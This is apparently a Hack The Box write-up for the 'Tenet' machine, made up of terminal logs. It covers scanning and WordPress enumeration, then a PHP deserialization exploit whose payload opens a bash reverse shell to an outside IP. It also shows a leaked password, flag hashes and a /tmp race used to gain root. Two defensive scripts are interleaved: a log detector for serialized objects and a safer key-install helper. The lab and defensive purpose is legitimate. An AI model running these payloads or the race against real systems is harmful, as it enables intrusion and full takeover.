$ sudo nmap -p- -T4 -A 10.10.10.223
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
$ dirb http://10.10.10.223
---- Scanning URL: http://10.10.10.223/ ----
+ http://10.10.10.223/index.html (CODE:200|SIZE:10918)
+ http://10.10.10.223/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.10.223/wordpress/
---- Entering directory: http://10.10.10.223/wordpress/ ----
+ http://10.10.10.223/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-includes/
+ http://10.10.10.223/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/ ----
+ http://10.10.10.223/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/css/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/images/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/includes/
+ http://10.10.10.223/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/js/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/maint/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/network/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-admin/user/
---- Entering directory: http://10.10.10.223/wordpress/wp-content/ ----
+ http://10.10.10.223/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/plugins/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/themes/
==> DIRECTORY: http://10.10.10.223/wordpress/wp-content/uploads/
---- Entering directory: http://10.10.10.223/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/network/ ----
+ http://10.10.10.223/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.223/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-admin/user/ ----
+ http://10.10.10.223/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.10.223/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-content/plugins/ ----
+ http://10.10.10.223/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-content/themes/ ----
+ http://10.10.10.223/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.10.223/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
$ echo 10.10.10.223 tenet.htb | sudo tee -a /etc/hosts
Key words on http://tenet.htb:
neil sator protagonist Rotas
$ wpscan --url tenet.htb
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://tenet.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://tenet.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://tenet.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://tenet.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.6 identified (Outdated, released on 2020-12-08).
| Found By: Rss Generator (Passive Detection)
| - http://tenet.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.6</generator>
| - http://tenet.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6</generator>
[+] WordPress theme in use: twentytwentyone
| Location: http://tenet.htb/wp-content/themes/twentytwentyone/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://tenet.htb/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: http://tenet.htb/wp-content/themes/twentytwentyone/style.css?ver=1.0
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://tenet.htb/wp-content/themes/twentytwentyone/style.css?ver=1.0, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 (22 / 22) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a
nc -lnvp 5555
kali@kali:~/0.htb/machines/Tenet223$ php -a
Interactive mode enabled
php > class DatabaseExport {
php { public $user_file = 'rce.php';
php { public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.134/4444 0>&1\'"); ?>';
php { }
php > print urlencode(serialize(new DatabaseExport));
O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A74%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.134%2F4444+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D
php >
kali@kali:~/0.htb/machines/Tenet223$ curl -i http://sator.tenet.htb/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A74%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.134%2F4444+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D
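From the defender's side, the request above is easy to recognise once the percent-encoding is stripped: a PHP object literal `O:<len>:"<Class>":<n>:{` arriving in a query parameter that the application feeds to unserialize(). The script below is an added example, not part of the write-up and not code from the box: it percent-decodes constructed access-log lines (IPs from the 192.0.2.0/24 documentation range) and flags any request carrying that marker. The function names `urldecode`, `flag_php_object` and `count_suspects` are my own.

```bash
#!/usr/bin/env bash
# Added example, not part of the write-up: flag requests whose query string
# carries a PHP-serialized object. The sator.php request is exactly this
# shape once the percent-encoding is removed.
# Log lines are constructed; IPs are from the 192.0.2.0/24 documentation range.
set -euo pipefail

# Percent-decode (%XX and '+') so encoded payloads become visible to the regex.
urldecode() {
    local s=${1//+/ }
    printf '%b' "${s//%/\\x}"
}

# Print a SUSPECT line and return 0 when the decoded request contains the
# PHP object marker  O:<len>:"<Class>":<n>:{  ; otherwise return 1.
flag_php_object() {
    local line=$1 decoded
    local re='O:[0-9]+:"[A-Za-z_][A-Za-z0-9_\\]*":[0-9]+:[{]'
    decoded=$(urldecode "$line")
    if [[ $decoded =~ $re ]]; then
        printf 'SUSPECT object=%s | %s\n' "${BASH_REMATCH[0]}" "$line"
        return 0
    fi
    return 1
}

# count_suspects LOGFILE -> number of flagged lines, printed on stdout
count_suspects() {
    local n=0 line
    while IFS= read -r line; do
        if flag_php_object "$line" >/dev/null; then n=$((n + 1)); fi
    done < "$1"
    echo "$n"
}

# Constructed sample log (combined-format style); two lines carry serialized objects.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [23/Apr/2021:20:01:02 +0000] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A1%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A8%3A%22test.txt%22%3B%7D HTTP/1.1" 200 512
192.0.2.11 - - [23/Apr/2021:20:03:11 +0000] "GET /sator.php?arepo=O%3A12%3A%22App%5CExporter%22%3A0%3A%7B%7D HTTP/1.1" 200 40
192.0.2.12 - - [23/Apr/2021:20:04:00 +0000] "GET /index.php/feed/ HTTP/1.1" 200 2048
192.0.2.13 - - [23/Apr/2021:20:05:30 +0000] "GET /wp-content/uploads/?note=TODO%3A+review HTTP/1.1" 200 1024
EOF

# Run the triage when executed directly.
if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    while IFS= read -r l; do flag_php_object "$l" || true; done < "$SAMPLE_LOG"
    echo "flagged: $(count_suspects "$SAMPLE_LOG")"
fi
```

Run it as-is and it reports the two serialized-object requests and `flagged: 2`. The regex only keys on the object marker, so plain arrays (`a:1:{...}`) or a stray `TODO:` in a parameter do not fire; namespaced classes (`App\Exporter`) do. On the application side the matching fix is to never pass user input to unserialize(), or at minimum to call it with `['allowed_classes' => false]` so no object with a destructor can be instantiated from the request.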
neil@tenet:/var/www/html/wordpress$ ll
wp-config.php
neil: Opera2112
kali@kali:~/0.htb/machines/Tenet223$ ssh neil@10.10.10.223
neil@tenet:~$ cat user.txt
9211f1ad8c04d5fd713685074e3d9b36
neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User neil may run the following commands on tenet:
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
while true; do echo "ssh-rsa <public key removed> kali@kali" | tee /tmp/ssh* > /dev/null; done
neil@tenet:~$ while true; do echo "ssh-rsa <public key removed> kali@kali" | tee /tmp/ssh* > /dev/null; done
</neil@tenet:~$>
sudo /usr/local/bin/enableSSH.sh
neil@tenet:/var/www/html/wordpress$ cd /usr/local/bin/
neil@tenet:/usr/local/bin$ ll
total 12
drwxr-xr-x 2 root root 4096 Dec 8 13:46 ./
drwxr-xr-x 10 root root 4096 Jul 25 2018 ../
-rwxr-xr-x 1 root root 1080 Dec 8 13:46 enableSSH.sh*
neil@tenet:/usr/local/bin$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/usr/local/bin$ sudo /usr/local/bin/enableSSH.sh
Error in adding root@ubuntu to authorized_keys file!
neil@tenet:/usr/local/bin$ sudo /usr/local/bin/enableSSH.sh
Successfully added root@ubuntu to authorized_keys file!
neil@tenet:/usr/local/bin$
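The privilege escalation works because a root-run, NOPASSWD sudo script stages the key in a predictable, world-writable location (`/tmp/ssh*`) and then trusts whatever it reads back, so a loop that keeps overwriting that file wins the race some of the time (two failures, then a success, in the session above). The source of `enableSSH.sh` is not shown in the write-up, so the script below is an added, hypothetical helper of my own (`install_pubkey`, `is_pubkey_line` are assumed names), not the box's script: it shows the pattern that removes the race, namely a private mktemp directory, strict validation of the key line, and a re-check of the staged file before it is used.

```bash
#!/usr/bin/env bash
# Added example, not the enableSSH.sh from the box (its source is not in the
# write-up). The race works because the helper stages the key in a predictable,
# world-writable path (/tmp/ssh*) and trusts whatever it reads back. This
# version removes each link in that chain.
set -euo pipefail

# Accept only a single OpenSSH public-key line: key type, base64 blob, optional comment.
is_pubkey_line() {
    local re='^(ssh-(rsa|ed25519)|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+=*( [^[:space:]]+)?$'
    [[ $1 =~ $re ]]
}

# install_pubkey KEY_LINE TARGET_FILE
# Stages the key in a fresh mktemp directory (mode 0700, unpredictable name),
# re-verifies the staged file before use, then appends it to TARGET_FILE.
install_pubkey() {
    local key=$1 target=$2 tmpdir tmp
    if ! is_pubkey_line "$key"; then
        echo "rejected: not a single public-key line" >&2
        return 1
    fi
    tmpdir=$(mktemp -d)   # private dir: a glob like /tmp/ssh* cannot reach it
    tmp=$tmpdir/key
    (umask 077; printf '%s\n' "$key" > "$tmp")
    # Defence in depth: regular file, not a symlink, owned by us, content unchanged.
    if [[ -L $tmp || ! -f $tmp || ! -O $tmp || "$(cat "$tmp")" != "$key" ]]; then
        rm -rf "$tmpdir"
        echo "rejected: staged file was altered" >&2
        return 1
    fi
    mkdir -p "$(dirname "$target")"
    (umask 077; cat "$tmp" >> "$target")
    rm -rf "$tmpdir"
    echo "added key to $target"
}

# Demo when run directly: install a constructed (not real) key into a scratch file.
if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    demo_key='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedDemoKeyMaterial0123456789abcdefghijk demo@example'
    install_pubkey "$demo_key" "$(mktemp -d)/authorized_keys"
fi
```

The validation step matters as much as the temp path: even if an attacker could still influence the staged file, only one well-formed key line is ever appended, so a second line or arbitrary content is refused. When auditing a sudoers entry like the one on this box, the questions to ask of the script are exactly these: where does it write, who else can write there, and does it validate what it reads back before acting as root.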
$ ssh root@10.10.10.223
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-129-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Apr 23 20:13:27 UTC 2021
System load: 1.35 Processes: 181
Usage of /: 15.2% of 22.51GB Users logged in: 1
Memory usage: 11% IP address for ens160: 10.10.10.223
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
53 packages can be updated.
31 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Feb 11 14:37:46 2021
root@tenet:~# ls
root.txt
root@tenet:~# cat root.txt
395bf519952f301869a9f1bf60f3a8bd
root@tenet:~#